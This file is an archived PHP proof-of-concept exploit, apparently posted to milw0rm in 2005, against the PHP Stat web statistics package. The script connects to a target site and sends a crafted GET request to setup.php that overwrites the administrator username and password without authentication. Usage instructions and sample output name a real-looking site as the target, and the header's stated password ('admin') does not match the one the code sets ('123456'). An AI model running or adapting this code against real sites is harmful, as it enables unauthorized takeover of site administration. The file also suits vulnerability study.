lilbool/vuln-code-analysis
0
1<?
2
3/*
4
5**************************************************************
6PHP Stat Administrative User Authentication Bypass POC Exploit
7 Code by Nikyt0x - Soulblack Security Research
8**************************************************************
9
10Advisory:
11 http://www.soulblack.com.ar/repo/papers/phpstat_advisory.txt
12
13Saludos:
14 Soulblack Staff, Status-x, NeosecurityTeam,
15 KingMetal, SWP, Trespasser...
16
17nikyt0x@gmail.com
18http://www.nikyt0x.tk
19
20**************************************************************
21**This Exploit Change Admin Username and Password
22**Username: admin
23**Password: admin
24**************************************************************
25
26
27php sbphpstatpoc.php www.spazfarm.com /spazstats/setup.php
28
29 ==============================================================
30 PHP Stat Administrative User Authentication Bypass POC Exploit
31 ==============================================================
32 by Nikyt0x - Soulblack Security Research
33
34 [+] Testing: www.spazfarm.com
35 [+] Socket
36 [+] Sending Exploit
37 [+] OK
38
39 Open www.spazfarm.com/spazstats/setup.php
40
41 Username: admin
42 Password: 123456
43
44**************************************************************
45*/
46
47// username and password
48
49$username = "admin";
50$password = "123456";
51
52function sh0w()
53{
54echo "\n ==============================================================\n";
55echo " PHP Stat Administrative User Authentication Bypass POC Exploit\n";
56echo " ==============================================================\n";
57echo " by Nikyt0x - Soulblack Security Research\n\n";
58}
59
60if ($argc != 3)
61{
62sh0w();
63echo "\n\n Usage:\n sbphpstatpoc.php www.site.com /dir/to/setup.php\n";
64exit();
65}
66
67
68if(!ereg('setup.php',$argv[2])) {
69 echo "URL to setup.php Incorrect.\n";
70 exit(0);
71}
72
73sh0w();
74
75echo " [+] Testing: $argv[1]\n";
76
77$s0ck3t = fsockopen($argv[1], 80);
78
79if (!$s0ck3t) {
80 echo " [-] Socket\n";
81 exit(0);
82} else {
83
84 $petici0n = "GET $argv[2]?check=yes&username=$username&password=$password HTTP/1.1\r\n";
85 $petici0n .= "Host: $argv[1]\r\n";
86 $petici0n .= "Connection: Close\r\n\r\n";
87
88 echo " [+] Socket\n";
89
90if(!fwrite($s0ck3t, $petici0n))
91 {
92 echo " [-] Sending Exploit\n";
93 exit(0);
94 }
95echo " [+] Sending Exploit\n";
96
97 while (!feof($s0ck3t)) {
98 $g3tdata = fgets($s0ck3t, 1024);
99 if (eregi('Setup has been updated',$g3tdata))
100 {
101 echo " [+] OK\n\n";
102 echo " Open $argv[1]$argv[2]\n\n Username: $username\n Password: $password\n";
103 exit();
104 }
105
106}
107fclose($s0ck3t);
108}
109
110?>
111
112# milw0rm.com [2005-05-30]